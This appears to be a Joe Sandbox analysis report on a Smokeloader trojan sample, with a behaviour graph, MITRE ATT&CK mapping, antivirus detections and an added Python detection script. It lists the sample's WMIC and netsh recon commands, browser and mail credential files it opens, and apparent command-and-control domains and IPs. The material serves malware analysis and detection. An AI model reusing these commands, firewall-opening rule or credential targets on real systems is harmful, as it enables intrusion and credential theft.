      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00581016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep
      Source: C:\Users\user\AppData\Local\Temp\9245.exe | Code function: 10_2_00007FF7327A78EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Code function: 0_2_0052092B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Code function: 0_2_00520D90 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Code function: 0_2_005BF171 push dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 5_2_004A092B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 5_2_004A0D90 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 5_2_0051E469 push dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 6_2_0052092B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 6_2_00520D90 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\derhswe | Code function: 6_2_00751339 push dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Code function: 7_2_005F092B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Code function: 7_2_005F0D90 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Code function: 7_2_0076E8DA push dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\jfrhswe | Code function: 8_2_0070092B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\jfrhswe | Code function: 8_2_00700D90 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\jfrhswe | Code function: 8_2_0074E702 push dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\9245.exe | Code function: 10_2_00007FF7327A2654 GetProcessHeap,RtlReAllocateHeap

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\explorer.exe | File created: jfrhswe.1.dr
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Thread created: C:\Windows\explorer.exe EIP: 31719A8
      Source: C:\Users\user\AppData\Roaming\derhswe | Thread created: unknown EIP: 13519A8
      Source: C:\Users\user\AppData\Roaming\derhswe | Thread created: unknown EIP: 34119A8
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Thread created: unknown EIP: 9CA1970
      Source: C:\Users\user\AppData\Roaming\jfrhswe | Thread created: unknown EIP: 8741970
      Source: C:\Windows\explorer.exe | Memory written: PID: 2140 base: 9779C0 value: 90
      Source: C:\Windows\explorer.exe | Memory written: PID: 5652 base: 7FF72B812D10 value: 90
      Source: C:\Windows\explorer.exe | Memory written: PID: 5368 base: 9779C0 value: 90
      Source: C:\Windows\explorer.exe | Memory written: PID: 5292 base: 7FF72B812D10 value: 90
      Source: C:\Windows\explorer.exe | Memory written: PID: 2164 base: 9779C0 value: 90
      Source: C:\Windows\explorer.exe | Memory written: PID: 4128 base: 7FF72B812D10 value: 90
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
      Source: C:\Users\user\AppData\Roaming\derhswe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
      Source: C:\Users\user\AppData\Roaming\derhswe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
      Source: C:\Users\user\AppData\Roaming\derhswe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
      Source: C:\Users\user\AppData\Roaming\derhswe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
      Source: C:\Users\user\AppData\Roaming\jfrhswe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
      Source: C:\Users\user\AppData\Roaming\jfrhswe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
      Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 9779C0
      Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 9779C0
      Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 9779C0
      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_02F210A5 wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep
      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_02F21016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep
      Source: C:\Users\user\AppData\Local\Temp\9245.exe | Process created: C:\Windows\System32\cmd.exe cmd
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ROUTE.EXE route print
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall show state
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
      Source: explorer.exe, 00000001.00000000.1777211765.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1779684746.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1775938824.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000001.00000000.1775938824.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
      Source: explorer.exe, 00000001.00000000.1775685561.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman$
      Source: explorer.exe, 00000001.00000000.1775938824.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
      Source: explorer.exe, 00000001.00000000.1775938824.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_031455EB cpuid
      Source: C:\Users\user\AppData\Local\Temp\9245.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\9245.exe | Code function: 10_2_00007FF7327A9224 GetSystemTimeAsFileTime,WaitForSingleObject,GetSystemTimeAsFileTime,TerminateProcess,WaitForSingleObject,GetExitCodeProcess
      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030F2198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary
      Source: C:\Users\user\AppData\Local\Temp\9245.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Lowering of HIPS / PFW / Operating System Security Settings

      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall show state
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall show state
      Source: 9245.exe, 0000000A.00000002.4175619168.000002988741C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Users\user\AppData\Local\Temp\9245.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\9245.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\9245.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
      Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
      Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
      Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

      Stealing of Sensitive Information

      Source: Yara match | File source: 00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000002.2045484809.0000000001FE1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.1799134235.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000002.2106729164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000008.00000002.2520412148.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000002.2106441385.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000007.00000002.2264170490.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000002.2045088261.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.1799202066.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000008.00000002.2520072402.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000011.00000002.4174299297.0000000000821000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: explorer.exe PID: 5368, type: MEMORYSTR
      Source: Yara match | File source: Process Memory Space: explorer.exe PID: 5292, type: MEMORYSTR
      Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
      Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
      Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
      Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
      Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
      Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
      Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
      Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

      Remote Access Functionality

      Source: Yara match | File source: 00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000002.2045484809.0000000001FE1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.1799134235.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000002.2106729164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000008.00000002.2520412148.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000002.2106441385.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000007.00000002.2264170490.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000002.2045088261.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.1799202066.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000008.00000002.2520072402.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000011.00000002.4174299297.0000000000821000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: explorer.exe PID: 5368, type: MEMORYSTR
      Source: Yara match | File source: Process Memory Space: explorer.exe PID: 5292, type: MEMORYSTR

      MITRE ATT&CK Matrix

      Techniques with matching signatures, by tactic; the number after each technique is the count shown in the report's matrix cell.

      Execution: Windows Management Instrumentation (241), Native API (11), Exploitation for Client Execution (1), Command and Scripting Interpreter (1)
      Persistence: DLL Side-Loading (1)
      Privilege Escalation: DLL Side-Loading (1), Process Injection (422)
      Defense Evasion: Disable or Modify Tools (2), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Software Packing (1), DLL Side-Loading (1), File Deletion (1), Masquerading (11), Virtualization/Sandbox Evasion (34), Process Injection (422), Hidden Files and Directories (1)
      Credential Access: OS Credential Dumping (1), Input Capture (11), Credentials in Registry (1)
      Discovery: System Time Discovery (1), File and Directory Discovery (3), System Information Discovery (249), Security Software Discovery (881), Virtualization/Sandbox Evasion (34), Process Discovery (4), Application Window Discovery (1), System Network Configuration Discovery (1)
      Collection: Archive Collected Data (11), Data from Local System (1), Email Collection (1), Input Capture (11)
      Command and Control: Ingress Tool Transfer (3), Encrypted Channel (21), Non-Application Layer Protocol (4), Application Layer Protocol (115)
      Impact: Data Encrypted for Impact (1)

      No technique under Reconnaissance, Resource Development, Initial Access, Lateral Movement or Exfiltration shows a count in the matrix.

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
Behavior Graph ID: 1528498
Sample: bCnarg2O62.exe
Start date: 08/10/2024
Architecture: WINDOWS
Score: 100

Start node
  DNS/IP: nwgrus.ru; ninjahallnews.com; 2 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
  Started: bCnarg2O62.exe; derhswe; jfrhswe; 2 other processes

bCnarg2O62.exe
  Signatures: Detected unpacking (changes PE section rights); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Switches to a custom stack to bypass stack traces
  Injected: explorer.exe 58 9

derhswe
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

jfrhswe
  Signatures: Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration); Creates a thread in another existing process (thread injection)

explorer.exe (injected)
  DNS/IP: ninjahallnews.com 23.145.40.168, ports 443, 49882, 49890, SURFAIRWIRELESS-IN-01US, Reserved; 211.171.233.129, ports 50064, 50066, 50068, LGDACOMLGDACOMCorporationKR, Korea Republic of; 2 other IPs or domains
  Dropped: C:\Users\user\AppData\Roaming\jfrhswe (PE32); C:\Users\user\AppData\Roaming\derhswe (PE32); C:\Users\user\AppData\Local\Temp\9245.exe (PE32+); 2 other malicious files
  Signatures: Benign windows process drops PE files; Injects code into the Windows Explorer (explorer.exe); Deletes itself after installation; 2 other signatures
  Started: 9245.exe 2; 1D0F.exe; explorer.exe 18; 5 other processes

9245.exe
  Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines); Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
  Started: cmd.exe 1

1D0F.exe
  Signatures: Antivirus detection for dropped file; Detected unpacking (changes PE section rights); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 5 other signatures

explorer.exe (second instance)
  Signatures: Found evasive API chain (may stop execution after checking mutex); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access)

5 other processes
  Signatures: Tries to harvest and steal browser information (history, passwords, etc)

cmd.exe
  Signatures: Uses netsh to modify the Windows network and firewall settings; Uses ipconfig to lookup or modify the Windows network settings; Modifies the windows firewall
  Started: WMIC.exe; systeminfo.exe; conhost.exe; 17 other processes

WMIC.exe
  Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines); Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
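The behavior graph above describes a chain that is easy to hunt for in endpoint telemetry: an injected explorer.exe writes extensionless PE32 files into %APPDATA%\Roaming and an .exe into %TEMP%, the Temp executable spawns cmd.exe, and that shell launches netsh (firewall change), ipconfig, systeminfo and WMIC queries against Win32_NetworkAdapter, Win32_PnPEntity and Win32_StartupCommand. The following is an added example, not Joe Sandbox code: it runs that logic over constructed process-creation and file-write records. The Event field names, the `is_pe` flag (a plain Sysmon log has no MZ-header field; you would derive it from a hash lookup or file inspection) and the command lines in the sample records are assumptions that mirror the graph, not strings from the report.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Indicators taken from the behavior graph: WMI classes used for VM/sandbox
# detection, recon tools launched from cmd.exe, and the two drop locations.
WMI_VM_CLASSES = ("win32_networkadapter", "win32_pnpentity", "win32_startupcommand")
RECON_TOOLS = {"netsh.exe", "ipconfig.exe", "systeminfo.exe", "wmic.exe"}
ROAMING_RE = re.compile(r"\\appdata\\roaming\\[^\\]+$", re.IGNORECASE)
TEMP_EXE_RE = re.compile(r"\\appdata\\local\\temp\\[^\\]+\.exe$", re.IGNORECASE)


@dataclass
class Event:
    """One telemetry record (field names are assumptions for this example;
    in Sysmon terms 'process' maps to Event ID 1 and 'file' to Event ID 11)."""
    kind: str                 # "process" (creation) or "file" (write)
    pid: int
    image: str                # image of the acting process
    parent_pid: int = 0
    parent_image: str = ""
    command_line: str = ""
    target: str = ""          # file events: path written
    is_pe: bool = False       # file events: content starts with an MZ header


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events):
    """Return findings for the chain in the graph: explorer.exe dropping PE
    files, a Temp-resident dropper spawning cmd.exe, netsh firewall changes,
    WMI VM probes, and a burst of recon tools from one cmd.exe."""
    findings = []
    recon_by_cmd = defaultdict(set)   # pid of cmd.exe -> recon tools it launched
    for ev in events:
        img = basename(ev.image)
        cmd = ev.command_line.lower()
        if ev.kind == "file" and img == "explorer.exe" and ev.is_pe:
            if ROAMING_RE.search(ev.target) and "." not in basename(ev.target):
                findings.append(f"explorer.exe wrote extensionless PE {ev.target}")
            elif TEMP_EXE_RE.search(ev.target):
                findings.append(f"explorer.exe dropped executable {ev.target}")
        elif ev.kind == "process":
            if img == "cmd.exe" and TEMP_EXE_RE.search(ev.parent_image):
                findings.append(f"cmd.exe spawned by Temp executable {basename(ev.parent_image)}")
            if img in RECON_TOOLS and basename(ev.parent_image) == "cmd.exe":
                recon_by_cmd[ev.parent_pid].add(img)
            if img == "netsh.exe" and "firewall" in cmd:
                findings.append(f"firewall change: {ev.command_line}")
            if img == "wmic.exe" and any(c in cmd for c in WMI_VM_CLASSES):
                findings.append(f"WMI VM/sandbox probe: {ev.command_line}")
    for pid, tools in recon_by_cmd.items():
        if len(tools) >= 3:   # a lone ipconfig from a user shell is noise; a burst is not
            findings.append(f"cmd.exe pid {pid} ran recon tools {sorted(tools)}")
    return findings


# Constructed records mirroring the graph (pids and command lines are made up).
EXPLORER = r"C:\Windows\explorer.exe"
CMD = r"C:\Windows\System32\cmd.exe"
DROPPER = r"C:\Users\user\AppData\Local\Temp\9245.exe"
SAMPLE_EVENTS = [
    Event("file", 1900, EXPLORER, target=r"C:\Users\user\AppData\Roaming\derhswe", is_pe=True),
    Event("file", 1900, EXPLORER, target=DROPPER, is_pe=True),
    Event("process", 2400, DROPPER, parent_pid=1900, parent_image=EXPLORER),
    Event("process", 3300, CMD, parent_pid=2400, parent_image=DROPPER),
    Event("process", 3600, r"C:\Windows\System32\wbem\WMIC.exe", parent_pid=3300,
          parent_image=CMD, command_line="wmic path Win32_NetworkAdapter get Name"),
    Event("process", 3900, r"C:\Windows\System32\systeminfo.exe", parent_pid=3300,
          parent_image=CMD, command_line="systeminfo"),
    Event("process", 4200, r"C:\Windows\System32\netsh.exe", parent_pid=3300, parent_image=CMD,
          command_line="netsh advfirewall firewall add rule name=allow dir=in action=allow"),
    Event("process", 4500, r"C:\Windows\System32\ipconfig.exe", parent_pid=3300,
          parent_image=CMD, command_line="ipconfig /all"),
    # benign noise: a non-PE write by explorer.exe and a single ipconfig from a user shell
    Event("file", 1900, EXPLORER, target=r"C:\Users\user\AppData\Roaming\notes.txt"),
    Event("process", 5000, r"C:\Windows\System32\ipconfig.exe", parent_pid=4900,
          parent_image=CMD, command_line="ipconfig"),
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The recon-burst rule keys on the parent cmd.exe pid rather than on any single tool, because ipconfig or systeminfo alone fire constantly in normal administration; the combination under one shell whose own parent lives in Temp is what this sample looks like.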

Antivirus, machine learning and genetic malware detection

Initial sample (Source | Detection | Scanner | Label)
bCnarg2O62.exe | 39% | ReversingLabs | Win32.Trojan.Smokeloader
bCnarg2O62.exe | 100% | Avira | HEUR/AGEN.1310247
bCnarg2O62.exe | 100% | Joe Sandbox ML |

Dropped files (Source | Detection | Scanner | Label)
C:\Users\user\AppData\Roaming\derhswe | 100% | Avira | HEUR/AGEN.1310247
C:\Users\user\AppData\Local\Temp\1D0F.exe | 100% | Avira | HEUR/AGEN.1310247
C:\Users\user\AppData\Roaming\jfrhswe | 100% | Avira | HEUR/AGEN.1310247
C:\Users\user\AppData\Roaming\derhswe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\1D0F.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\jfrhswe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\9245.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\derhswe | 39% | ReversingLabs | Win32.Trojan.Smokeloader

Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches
URLs (Source | Detection | Scanner | Label)
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe
https://powerpoint.office.comcember | 0% | URL Reputation | safe
https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://excel.office.com | 0% | URL Reputation | safe
http://schemas.micro | 0% | URL Reputation | safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | URL Reputation | safe
https://word.office.com | 0% | URL Reputation | safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://android.notify.windows.com/iOS | 0% | URL Reputation | safe
